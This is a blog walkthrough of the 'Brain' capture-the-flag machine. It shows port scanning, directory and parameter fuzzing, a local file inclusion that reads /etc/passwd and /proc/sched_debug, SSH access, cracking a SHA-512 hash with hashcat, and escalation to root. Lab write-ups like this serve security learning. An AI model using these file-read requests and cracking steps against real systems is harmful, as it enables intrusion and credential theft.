Brain by D4t4s3c
00. Metainfo
| Title: | Brain |
| Author: | D4t4s3c |
| Release date: | 2021-01-29 |
| Download from: | Vulnyx |
| Level: | Easy |
| System: | Linux |
| You’ll learn: | Enumerate, LFI, Hashcat |
01. Admission
Brain is a fairly simple machine and you can complete it quickly. Requires knowledge of Linux at certain points.
02. Scan open ports
First, let’s see what the open ports are:
msf6 exploit(unix/webapp/webmin_upload_exec) > db_nmap 172.16.1.120
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-23 18:13 CEST
[*] Nmap: Nmap scan report for Brain.lan (172.16.1.120)
[*] Nmap: Host is up (0.00060s latency).
[*] Nmap: Not shown: 998 closed ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 22/tcp open ssh
[*] Nmap: 80/tcp open http
[*] Nmap: MAC Address: CE:4A:E6:3D:6B:0E (Unknown)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.46 seconds
msf6 exploit(unix/webapp/webmin_upload_exec) > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
172.16.1.120 22 tcp ssh open OpenSSH 7.9p1 Debian 10+deb10u2 protocol 2.0
172.16.1.120 80 tcp http open Apache httpd 2.4.38 (Debian)
There are two open ports: 22 and 80, which is the standard duo.
03. Enumerate the webserver
Let’s check what are the files on the server:
# root@kali:/home/szikers# feroxbuster -e -x php,txt,html --dont-scan=http://172.16.1.120/icons -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://172.16.1.120/
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.3.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://172.16.1.120/
🚫 Don't Scan │ http://172.16.1.120/icons
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.3.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php, txt, html]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
200 368l 933w 10701c http://172.16.1.120/index.html
200 4l 52w 162c http://172.16.1.120/robots.txt
301 9l 28w 317c http://172.16.1.120/brainstorm
200 4l 7w 80c http://172.16.1.120/brainstorm/index.html
200 0l 0w 0c http://172.16.1.120/brainstorm/file.php
403 9l 28w 277c http://172.16.1.120/server-status
[####################] - 7m 1661039/1661039 0s found:6 errors:0
[####################] - 7m 830512/830512 1908/s http://172.16.1.120/
[####################] - 7m 830512/830512 1908/s http://172.16.1.120/brainstorm
04. Fuzzing
We found http://172.16.1.120/brainstorm/file.php. Let’s fuzz this file.
# root@kali:/home/szikers# ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://172.16.1.120/brainstorm/file.php?FUZZ=/etc/hosts -fs 0
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://172.16.1.120/brainstorm/file.php?FUZZ=/etc/hosts
:: Wordlist : FUZZ: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 0
________________________________________________
file [Status: 200, Size: 185, Words: 19, Lines: 8]
:: Progress: [220547/220547] :: Job [1/1] :: 4025 req/sec :: Duration: [0:00:55] :: Errors: 0 ::
We can now download the username file and see it.
# curl -O http://172.16.1.120/brainstorm/file.php?file=/etc/passwd
# root@kali:/home/szikers/brain# cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
salomon:x:1000:1000:salomon,,,:/home/salomon:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
We see the user of solomon. Let’s try to find it on the system via LFI:
# root@kali:/usr/share/wordlists/seclists/Discovery/Web-Content# ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/LinuxFileList.txt -u http://172.16.1.120/brainstorm/file.php?file=FUZZ -mr salomon
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://172.16.1.120/brainstorm/file.php?file=FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/LinuxFileList.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Regexp: salomon
________________________________________________
/etc/group [Status: 200, Size: 740, Words: 1, Lines: 54]
/etc/group- [Status: 200, Size: 724, Words: 1, Lines: 53]
/etc/passwd [Status: 200, Size: 1401, Words: 13, Lines: 27]
/etc/passwd- [Status: 200, Size: 1334, Words: 11, Lines: 26]
/var/cache/debconf/config.dat-old [Status: 200, Size: 41158, Words: 2727, Lines: 731]
/var/cache/debconf/config.dat [Status: 200, Size: 41484, Words: 2739, Lines: 747]
/var/log/wtmp [Status: 200, Size: 108672, Words: 3, Lines: 22]
/proc/sched_debug [Status: 200, Size: 18700, Words: 8789, Lines: 213]
:: Progress: [87018/87018] :: Job [1/1] :: 2991 req/sec :: Duration: [0:00:32] :: Errors: 1 ::
# root@kali:/home/szikers/brain# curl -O http://172.16.1.120/brainstorm/file.php?file=/proc/sched_debug
# root@kali:/home/szikers/brain# cat sched_debug | grep salomon
Ssalomon:[no valid password] 382 2487.389640 18 120 0.000000 1.924317 0.000000 0 0 /
In /proc/sched_debug is password for salomon.
05. Shell
We’re on the console. Let’s check what open ports are.
# root@kali:/home/szikers/brain# ssh salomon@172.16.1.120
salomon@172.16.1.120's password:
Linux Brain 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
BBBBBBBBBBBBBBBBB RRRRRRRRRRRRRRRRR AAA IIIIIIIIII NNNNNNNN NNNNNNNN
B::::::::::::::::B R::::::::::::::::R A:::A I::::::::I N:::::::N N::::::N
B::::::BBBBBB:::::B R::::::RRRRRR:::::R A:::::A I::::::::I N::::::::N N::::::N
BB:::::B B:::::B RR:::::R R:::::R A:::::::A II::::::II N:::::::::N N::::::N
B::::B B:::::B R::::R R:::::R A:::::::::A I::::I N::::::::::N N::::::N
B::::B B:::::B R::::R R:::::R A:::::A:::::A I::::I N:::::::::::N N::::::N
B::::BBBBBB:::::B R::::RRRRRR:::::R A:::::A A:::::A I::::I N:::::::N::::N N::::::N
B:::::::::::::BB R:::::::::::::RR A:::::A A:::::A I::::I N::::::N N::::N N::::::N
B::::BBBBBB:::::B R::::RRRRRR:::::R A:::::A A:::::A I::::I N::::::N N::::N:::::::N
B::::B B:::::B R::::R R:::::R A:::::AAAAAAAAA:::::A I::::I N::::::N N:::::::::::N
B::::B B:::::B R::::R R:::::R A:::::::::::::::::::::A I::::I N::::::N N::::::::::N
B::::B B:::::B R::::R R:::::R A:::::AAAAAAAAAAAAA:::::A I::::I N::::::N N:::::::::N
BB:::::BBBBBB::::::B RR:::::R R:::::R A:::::A A:::::A II::::::II N::::::N N::::::::N
B:::::::::::::::::B R::::::R R:::::R A:::::A A:::::A I::::::::I N::::::N N:::::::N
B::::::::::::::::B R::::::R R:::::R A:::::A A:::::A I::::::::I N::::::N N::::::N
BBBBBBBBBBBBBBBBB RRRRRRRR RRRRRRR AAAAAAA AAAAAAA IIIIIIIIII NNNNNNNN NNNNNNN
# salomon@Brain:~$ ss -tuln
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 5 127.0.0.1:65000 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 128 *:80 *:*
Maybe something interesting is going on port 65000? Let’s check it out.
# salomon@Brain:~$ telnet 127.0.0.1 65000
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
GET / HTTP/1.1
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/2.7.16
Date: Sat, 23 Oct 2021 16:59:18 GMT
Content-type: text/html
Content-Length: 192
Last-Modified: Tue, 26 Jan 2021 11:20:06 GMT
[+] You are a great Hacker!! I think you are looking for this:
*****42251F5A17167
Connection closed by foreign host.
It’s a hash. Let’s try to crack it:
c:\temp\hashcat-6.2.3>hashcat.exe -O -a0 -m1700 crack\brain.txt wordlists\rockyou.txt
hashcat (v6.2.3) starting
OpenCL API (OpenCL 2.1 AMD-APP (3075.13)) - Platform #1 [Advanced Micro Devices, Inc.]
======================================================================================
* Device #1: Radeon (TM) RX 470 Graphics, 4032/4096 MB (3264 MB allocatable), 32MCU
OpenCL API (OpenCL 1.2 ) - Platform #2 [Intel(R) Corporation]
=============================================================
* Device #2: Intel(R) HD Graphics 4600, 1565/1629 MB (407 MB allocatable), 20MCU
* Device #3: Intel(R) Core(TM) i5-4460 CPU @ 3.20GHz, skipped
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 31
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Optimized-Kernel
* Zero-Byte
* Precompute-Init
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
* Uses-64-Bit
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 578 MB
Dictionary cache hit:
* Filename..: wordlists\rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
065bb0b9a0c654e5b3b********b7521641d742251f5a17167:****
Session..........: hashcat
Status...........: Cracked
Hash.Name........: SHA2-512
Hash.Target......: 065bb0b9a0c654e5b3b6292c4698bd67ce6a331209d941989ec...a17167
Time.Started.....: Sat Oct 23 19:02:44 2021 (0 secs)
Time.Estimated...: Sat Oct 23 19:02:44 2021 (0 secs)
Kernel.Feature...: Optimized Kernel
Guess.Base.......: File (wordlists\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 0 H/s (0.00ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Speed.#2.........: 3436.2 kH/s (4.47ms) @ Accel:256 Loops:1 Thr:8 Vec:1
Speed.#*.........: 3436.2 kH/s
Recovered........: 1/1 (100.00%) Digests
Progress.........: 40961/14344385 (0.29%)
Rejected.........: 1/40961 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-0 Iteration:0-1
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: [Copying]
Candidates.#2....: 123456 -> GYX9sxaU
Hardware.Mon.#1..: Util: 0% Core:1213MHz Mem:1650MHz Bus:16
Hardware.Mon.#2..: N/A
Started: Sat Oct 23 19:02:42 2021
Stopped: Sat Oct 23 19:02:45 2021
We got root:
# salomon@Brain:~$ su root
Contraseña:
# root@Brain:/home/salomon# id
uid=0(root) gid=0(root) grupos=0(root)
root@Brain:/home/salomon#
if you liked this post, or would like to change something, write to kerszi@protonmail.com.
Zostaw komentarz